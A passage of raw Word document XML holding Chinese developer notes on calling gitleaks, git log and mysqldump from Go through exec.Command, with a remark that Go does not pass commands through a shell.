        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>GitLeakEXE, "detect", no_git, "-f", "json", "-r", filepath.Join(ZipDestFileDir, GitLeakReportFile), "-v", "-s", ZipDestFileDir, "-c", TomlRule, "--exit-code", ExitCode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="531755CA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41430BD6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4429E855" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>var stdout, stderr bytes.Buffer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16C2EBAF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:tab/>
        <w:t>cmd.Stdout = &amp;stdout</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ED85424" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:tab/>
        <w:t>cmd.Stderr = &amp;stderr</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C20D26D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>fmt.Println("</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>启动命令行扫描</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72358845" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>err = cmd.Run()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AB9B5C2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="117E7C2A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>outStr, errStr := string(stdout.Bytes()), string(stderr.Bytes())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C6E22F0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>fmt.Println(outStr, errStr)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="683F1632" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5743612B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>if err != nil {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EF382C4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>log.Fatalf("cmd.Run() failed with %s\n", err)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EEC725E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FEC5FD4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A254692" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>gitleaks</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>git</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令托代码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="731120EF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>// GitLog returns a channel of gitdiff.File objects from the</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73295F1E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>// git log -p command for the given source.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1532EA20" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>func GitLog(source string, logOpts string) (&lt;-chan *gitdiff.File, error) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D4C9A93" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>sourceClean := filepath.Clean(source)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ED2E825" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>var cmd *exec.Cmd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C20BF1D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>if logOpts != "" {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F50960C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>args := []string{"-C", sourceClean, "log", "-p", "-U0"}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01993463" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:tab/>
        <w:t>args = append(args, strings.Split(logOpts, " ")...)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D7B6E56" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:tab/>
        <w:t>cmd = exec.Command("git", args...)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3344D82C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>} else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7325E9D2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>cmd = exec.Command("git", "-C", sourceClean, "log", "-p", "-U0",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10881554" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>"--full-history", "--all")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FA6EAB1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51866476" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2BC8ECBE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>log.Debug().Msgf("executing: %s", cmd.String())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="562F01C0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6462FC96" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:tab/>
        <w:t>stdout, err := cmd.StdoutPipe()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4480FE87" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>if err != nil {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23B15A6F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>return nil, err</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65E7228C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F2546F9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:tab/>
        <w:t>stderr, err := cmd.StderrPipe()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0420B0CD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>if err != nil {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="752B6323" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>return nil, err</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C873E89" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B76DB53" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>if err</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> := cmd.Start</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(); err != nil {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69C8B28D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>return nil, err</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5376BC4A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D224066" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="760D308A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>go listenForStdErr(stderr)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="730C13C4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>// HACK: to avoid https://github.com/zricethezav/gitleaks/issues/722</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="315F4D4D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>time.Sleep(50 * time.Millisecond)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="302549A2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21868A58" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>return gitdiff.Parse(stdout)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4176182D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A8A57C1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5855660C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>执行长的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>shell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令被改变</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F38B984" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>推测golang并不是使用shell执行命令，而且没有py的shell=True这种参数。golang本身也会对命令执行的命令进行拼接等操作，会出现字符串混乱的情况，导致命令无法正确执行。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E31F105" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7CF80E27" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>如海林写的mysqldump命令：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5343D6FE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C9BAC9B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>func populate(table string, path string, dateStr string, datetimeStr string, s *sync.WaitGroup) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B39AA73" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>defer s.Done()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E4CC63B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>backupPath := path + "/" + dateStr + "_" + table + ".sql"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="425DB813" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>fmt.Printf("</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>当前同步的表为：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>%s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，存储路径为：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>%s\n", table, backupPath)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="206B874C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>mysqldumpCmd := `mysqldump -h ` + host + ` -P ` + port + ` -u` + user + ` -p` + password +</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="583232A5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
